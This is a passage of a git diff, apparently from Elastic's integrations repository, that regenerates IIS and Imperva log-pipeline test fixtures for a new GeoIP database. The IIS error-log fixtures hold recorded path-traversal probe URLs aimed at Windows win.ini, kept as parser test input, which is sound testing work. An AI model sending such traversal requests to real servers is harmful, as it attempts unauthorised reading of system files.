@@ -404,7 +404,7 @@ }, "event": { "duration": 15000000, - "ingested": "2021-12-09T13:39:35.443440100Z", + "ingested": "2021-12-14T14:46:48.252507584Z", "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/a9e2fe596ac14a4ab07beb6b6e2c6545/15a3917cacf44de59af9cc899e90a9d4.png width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504478161.16021944379;+_gat_UA-155746052-5=1;+BIGipServerYAkgvoMHHYQAGkWsadfsdfEWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYaferu1dRyQoUTVVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 15 67.43.156.14", "kind": "event", "category": [ @@ -492,7 +492,7 @@ }, "event": { "duration": 0, - "ingested": "2021-12-09T13:39:35.443445300Z", + "ingested": "2021-12-14T14:46:48.252507970Z", "original": "2020-10-08 22:00:22 W3SVC2 freca1 10.24.129.162 GET /Blob/ff64cd9efcf4424dbf06b3b8133eeea2/f2e0b2998b1f43cb98e5b31c7faa91f4.jpg width=60\u0026height=20\u0026mode=crop 80 - 10.24.136.240 HTTP/1.1 Mozilla/5.0+(iPhone;+CPU+iPhone+OS+13_7+like+Mac+OS+X)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/13.1.2+Mobile/15E148+Safari/604.1 imagedpi=1;+imagequality=30;+_ga=GA1.2.14440223724.16021494379;+_gid=GA1.2.12504748161.16021944379;+_gat_UA-155764052-5=1;+BIGipServerYAkgvoMHHYQAGkWEsadfsdfsWnyAqA=!vbipVwbt0UWJ4QSsPvjjVxViTXMqdXWYu1dRyQoUTVerwerVBGLZPB39PoNX5Tw66+GT0ChJCfnp/xfhM8lI=;+_gcl_au=1.1.1297303538.1602194379 https://www.hogeschoolrotterdam.nl/opleidingen/bachelor/elektrotechniek/voltijd/ images.hogeschoolrotterdam.nl 304 0 0 388 979 0 67.43.156.14", "kind": "event", "category": [ 
diff --git a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json index 23aa1ecfdc8..1fced876992 100644 --- a/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json +++ b/packages/iis/data_stream/access/_dev/test/pipeline/test-x-forward-for.log-expected.json @@ -48,7 +48,7 @@ }, "event": { "duration": 26000000, - "ingested": "2021-12-09T13:39:36.546140500Z", + "ingested": "2021-12-14T14:46:49.526779223Z", "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 26 192.168.198.23", "kind": "event", "category": [ @@ -122,7 +122,7 @@ }, "event": { "duration": 32000000, - "ingested": "2021-12-09T13:39:36.546153400Z", + "ingested": "2021-12-14T14:46:49.526782023Z", "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadBatchTotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23", "kind": "event", "category": [ 
@@ -196,7 +196,7 @@ }, "event": { "duration": 46000000, - "ingested": "2021-12-09T13:39:36.546173100Z", + "ingested": "2021-12-14T14:46:49.526782477Z", "original": "2020-10-07 23:00:17 192.168.16.11 POST /Production-UI/api/finance/legacy/GeneralLedger/LoadJETotals - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 46 192.168.198.23", "kind": "event", "category": [ @@ -271,7 +271,7 @@ }, "event": { "duration": 32000000, - "ingested": "2021-12-09T13:39:36.546192Z", + "ingested": "2021-12-14T14:46:49.526782875Z", "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=Subsys,Ref\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23", "kind": "event", "category": [ @@ -346,7 +346,7 @@ }, "event": { "duration": 166000000, - "ingested": "2021-12-09T13:39:36.546201100Z", + "ingested": "2021-12-14T14:46:49.526783256Z", "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=RecNo\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23", "kind": "event", "category": [ 
@@ -420,7 +420,7 @@ }, "event": { "duration": 60000000, - "ingested": "2021-12-09T13:39:36.546217700Z", + "ingested": "2021-12-14T14:46:49.526783625Z", "original": "2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23", "kind": "event", "category": [ @@ -494,7 +494,7 @@ }, "event": { "duration": 72000000, - "ingested": "2021-12-09T13:39:36.546240Z", + "ingested": "2021-12-14T14:46:49.526784018Z", "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23", "kind": "event", "category": [ @@ -568,7 +568,7 @@ }, "event": { "duration": 88000000, - "ingested": "2021-12-09T13:39:36.546248800Z", + "ingested": "2021-12-14T14:46:49.526784412Z", "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23", "kind": "event", "category": [ 
@@ -642,7 +642,7 @@ }, "event": { "duration": 286000000, - "ingested": "2021-12-09T13:39:36.546255Z", + "ingested": "2021-12-14T14:46:49.526784786Z", "original": "2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23", "kind": "event", "category": [ diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json index 567c09487cc..742c9994e92 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json @@ -1,24 +1,6 @@ { "expected": [ { - "destination": { - "port": 80, - "address": "172.31.77.6", - "ip": "172.31.77.6" - }, - "source": { - "port": 2094, - "address": "172.31.77.6", - "ip": "172.31.77.6" - }, - "url": { - "path": "/qos/1kbfile.txt", - "extension": "txt", - "original": "/qos/1kbfile.txt" - }, - "tags": [ - "preserve_original_event" - ], "iis": { "error": { "reason_phrase": "ConnLimit" @@ -34,6 +16,11 @@ "172.31.77.6" ] }, + "destination": { + "port": 80, + "address": "172.31.77.6", + "ip": "172.31.77.6" + }, "http": { "request": { "method": "GET" @@ -43,8 +30,13 @@ "status_code": 503 } }, + "source": { + "port": 2094, + "address": "172.31.77.6", + "ip": "172.31.77.6" + }, "event": { - "ingested": "2021-12-09T13:39:38.169719300Z", + "ingested": "2021-12-14T14:46:51.146852766Z", "original": "2018-01-01 08:09:10 172.31.77.6 2094 172.31.77.6 80 HTTP/1.1 GET /qos/1kbfile.txt 503 - ConnLimit -", "category": [ "web", 
@@ -55,27 +47,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 80, - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "source": { - "port": 2780, - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "url": { - "path": "/ThisIsMyUrl.htm", - "extension": "htm", - "original": "/ThisIsMyUrl.htm" + "path": "/qos/1kbfile.txt", + "extension": "txt", + "original": "/qos/1kbfile.txt" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "Hostname" @@ -91,6 +73,11 @@ "127.0.0.1" ] }, + "destination": { + "port": 80, + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "http": { "request": { "method": "GET" @@ -100,8 +87,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 2780, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:38.169724100Z", + "ingested": "2021-12-14T14:46:51.146855078Z", "original": "2018-01-01 09:10:11 67.43.156.13 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -", "category": [ "web", @@ -112,26 +116,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 80, - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "source": { - "port": 2894, - "address": "67.43.156.13", - "ip": "67.43.156.13" }, "url": { - "path": "/", - "original": "/" + "path": "/ThisIsMyUrl.htm", + "extension": "htm", + "original": "/ThisIsMyUrl.htm" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "Version_N/S" @@ -147,6 +142,11 @@ "127.0.0.1" ] }, + "destination": { + "port": 80, + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "http": { "request": { "method": "GET" 
@@ -156,8 +156,25 @@ "status_code": 505 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.13", + "port": 2894, + "ip": "67.43.156.13" + }, "event": { - "ingested": "2021-12-09T13:39:38.169727800Z", + "ingested": "2021-12-14T14:46:51.146855565Z", "original": "2018-01-01 10:11:12 67.43.156.13 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -", "category": [ "web", @@ -168,7 +185,14 @@ ], "kind": "event", "outcome": "failure" - } + }, + "url": { + "path": "/", + "original": "/" + }, + "tags": [ + "preserve_original_event" + ] }, { "iis": { @@ -192,12 +216,24 @@ "ip": "127.0.0.1" }, "source": { - "port": 64388, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.13", + "port": 64388, "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:39:38.169731300Z", + "ingested": "2021-12-14T14:46:51.146855982Z", "original": "2018-01-01 11:12:13 67.43.156.13 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -", "category": [ "web", diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json index 8d04eec0d0a..c0fc6cecd03 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json 
@@ -1,24 +1,6 @@ { "expected": [ { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" - }, - "url": { - "path": "12.2.1", - "extension": "1", - "original": "12.2.1" - }, - "tags": [ - "preserve_original_event" - ], "iis": { "error": { "reason_phrase": "URL" @@ -34,6 +16,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "t3" @@ -43,8 +30,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462543700Z", + "ingested": "2021-12-14T14:46:51.522819409Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -", "category": [ "web", @@ -55,27 +59,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "path": "./././././../../../../../../../../", - "extension": "/", - "original": "./././././../../../../../../../../" + "path": "12.2.1", + "extension": "1", + "original": "12.2.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "URL" @@ -91,6 +85,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" 
@@ -100,8 +99,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462553Z", + "ingested": "2021-12-14T14:46:51.522822131Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -", "category": [ "web", @@ -112,25 +128,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "original": "/..\\pixfir~1\\how_to_login.html" + "path": "./././././../../../../../../../../", + "extension": "/", + "original": "./././././../../../../../../../../" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "Forbidden" @@ -146,6 +154,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -155,8 +168,25 @@ "status_code": 403 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462558900Z", + "ingested": "2021-12-14T14:46:51.522822594Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /..\\pixfir~1\\how_to_login.html 403 - Forbidden -", "category": [ "web", 
@@ -167,25 +197,15 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "original": "..\\..\\..\\..\\..\\..\\winnt\\win.ini" + "original": "/..\\pixfir~1\\how_to_login.html" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "URL" @@ -201,6 +221,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -210,8 +235,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462564400Z", + "ingested": "2021-12-14T14:46:51.522822966Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini 400 - URL -", "category": [ "web", @@ -222,27 +264,15 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "path": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini", - "extension": "ini", - "original": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini" + "original": "..\\..\\..\\..\\..\\..\\winnt\\win.ini" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "NotFound" @@ -258,6 +288,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" 
@@ -267,8 +302,25 @@ "status_code": 404 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462569800Z", + "ingested": "2021-12-14T14:46:51.522823320Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -", "category": [ "web", @@ -279,25 +331,17 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "original": "/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini" + "path": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini", + "extension": "ini", + "original": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "Forbidden" @@ -313,6 +357,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" @@ -322,8 +371,25 @@ "status_code": 403 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462575200Z", + "ingested": "2021-12-14T14:46:51.522823679Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini 403 - Forbidden -", "category": [ "web", 
@@ -334,26 +400,15 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "path": "*", - "original": "*" + "original": "/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "NotFound" @@ -369,6 +424,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "OPTIONS" @@ -378,8 +438,25 @@ "status_code": 404 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462580600Z", + "ingested": "2021-12-14T14:46:51.522824037Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -", "category": [ "web", @@ -390,26 +467,16 @@ ], "kind": "event", "outcome": "failure" - } - }, - { - "destination": { - "port": 443, - "address": "192.168.101.101", - "ip": "192.168.101.101" - }, - "source": { - "port": 12345, - "address": "67.43.156.15", - "ip": "67.43.156.15" }, "url": { - "path": "/fee\u0026fie=foe", - "original": "/fee\u0026fie=foe" + "path": "*", + "original": "*" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "iis": { "error": { "reason_phrase": "URL" @@ -425,6 +492,11 @@ "192.168.101.101" ] }, + "destination": { + "port": 443, + "address": "192.168.101.101", + "ip": "192.168.101.101" + }, "http": { "request": { "method": "GET" 
@@ -434,8 +506,25 @@ "status_code": 400 } }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.15", + "port": 12345, + "ip": "67.43.156.15" + }, "event": { - "ingested": "2021-12-09T13:39:38.462586Z", + "ingested": "2021-12-14T14:46:51.522824411Z", "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /fee\u0026fie=foe 400 - URL -", "category": [ "web", @@ -446,7 +535,14 @@ ], "kind": "event", "outcome": "failure" - } + }, + "url": { + "path": "/fee\u0026fie=foe", + "original": "/fee\u0026fie=foe" + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json index 5b5975e1200..657967a2e13 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json @@ -27,7 +27,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:39:39.018996800Z", + "ingested": "2021-12-14T14:46:52.366866064Z", "original": "2018-12-30 14:22:07 ::1%0 49958 ::1%0 80 - - - - - - Timer_ConnectionIdle -", "category": [ "web", diff --git a/packages/iis/manifest.yml b/packages/iis/manifest.yml index 4f39fce9252..da2acc24d2e 100644 --- a/packages/iis/manifest.yml +++ b/packages/iis/manifest.yml @@ -1,6 +1,6 @@ name: iis title: IIS -version: 0.8.1 +version: 0.8.2 description: Collect logs and metrics from Internet Information Services (IIS) servers with Elastic Agent. type: integration icons: diff --git a/packages/imperva/changelog.yml b/packages/imperva/changelog.yml index 8d241265c82..701e0056094 100644 --- a/packages/imperva/changelog.yml 
+++ b/packages/imperva/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/imperva/data_stream/securesphere/_dev/test/pipeline/test-generated.log-expected.json b/packages/imperva/data_stream/securesphere/_dev/test/pipeline/test-generated.log-expected.json index f418b266b5e..52b3b82b637 100644 --- a/packages/imperva/data_stream/securesphere/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/imperva/data_stream/securesphere/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.70.155.35,dstPort=892,dbUsername=tatno,srcIP=10.81.122.126,srcPort=4141,creatTime=29 January 2016 06:09:59,srvGroup=uam,service=untutl,appName=rad,event#=taliqu,eventType=Login,usrGroup=ommod,usrAuth=True,application=\"scivel\",osUsername=aqui,srcHost=radipis5408.mail.local,dbName=enatuse,schemaName=magn,bindVar=equuntu,sqlError=failure,respSize=5910,respTime=10.347000,affRows=sum,action=\"cancel\",rawQuery=\"sit\"", "event": { - "ingested": "2021-06-09T11:17:04.825696700Z" + "ingested": "2021-12-14T14:46:55.618542860Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=nimadmin,createTime=2016-02-12 13:12:33,eventType=erep,eventSev=low,username=temq,subsystem=ugiatqu,message=\"eacomm\"", "event": { - "ingested": "2021-06-09T11:17:04.825722Z" + "ingested": "2021-12-14T14:46:55.618545762Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.58.116.231,dstPort=996,dbUsername=qua,srcIP=10.159.182.171,srcPort=3947,creatTime=2016-02-26 20:15:08,srvGroup=apariat,service=mol,appName=pteursi,event#=onse,eventType=rumet,usrGroup=oll,usrAuth=erc,application=\"taliqu\",osUsername=temUten,srcHost=ccusan7572.api.home,dbName=aveniam,schemaName=uradi,bindVar=nimadmin,sqlError=failure,respSize=3626,respTime=79.328000,affRows=ender,action=\"accept\",rawQuery=\"ehenderi\"", "event": { - "ingested": "2021-06-09T11:17:04.825729900Z" + "ingested": "2021-12-14T14:46:55.618546199Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.232.27.250,dstPort=7838,dbUsername=mquidol,srcIP=10.18.124.28,srcPort=7668,creatTime=12 March 2016 
03:17:42,srvGroup=rsitamet,service=lupt,appName=xea,event#=qua,eventType=Login,usrGroup=luptatev,usrAuth=False,application=\"admi\",osUsername=modocons,srcHost=elaudant5931.internal.invalid,dbName=lores,schemaName=lapariat,bindVar=eddoei,sqlError=failure,respSize=6564,respTime=87.496000,affRows=nimadmin,action=\"cancel\",rawQuery=\"xercitat\"", "event": { - "ingested": "2021-06-09T11:17:04.825735500Z" + "ingested": "2021-12-14T14:46:55.618546636Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=ationemu,event#=ice,createTime=2016-03-26 10:20:16,updateTime=estiae,alertSev=high,group=laborum,ruleName=\"tionof\",evntDesc=\"snostrud\",category=nama,disposition=quisnos,eventType=ite,proto=icmp,srcPort=2707,srcIP=10.6.137.200,dstPort=5697,dstIP=10.197.250.10,policyName=\"bor\",occurrences=7243,httpHost=hitect,webMethod=dol,url=\"https://internal.example.net/namali/taevit.html?nsecte=itame#eumfug\",webQuery=\"lit\",soapAction=asun,resultCode=estia,sessionID=eaq,username=occae,addUsername=ctetura,responseTime=labore,responseSize=texp,direction=external,dbUsername=adeseru,queryGroup=emoe,application=\"eaq\",srcHost=amest4147.mail.host,osUsername=intoc,schemaName=oluptas,dbName=tNequepo,hdrName=lup,action=cancel", "event": { - "ingested": "2021-06-09T11:17:04.825765500Z" + "ingested": "2021-12-14T14:46:55.618547038Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 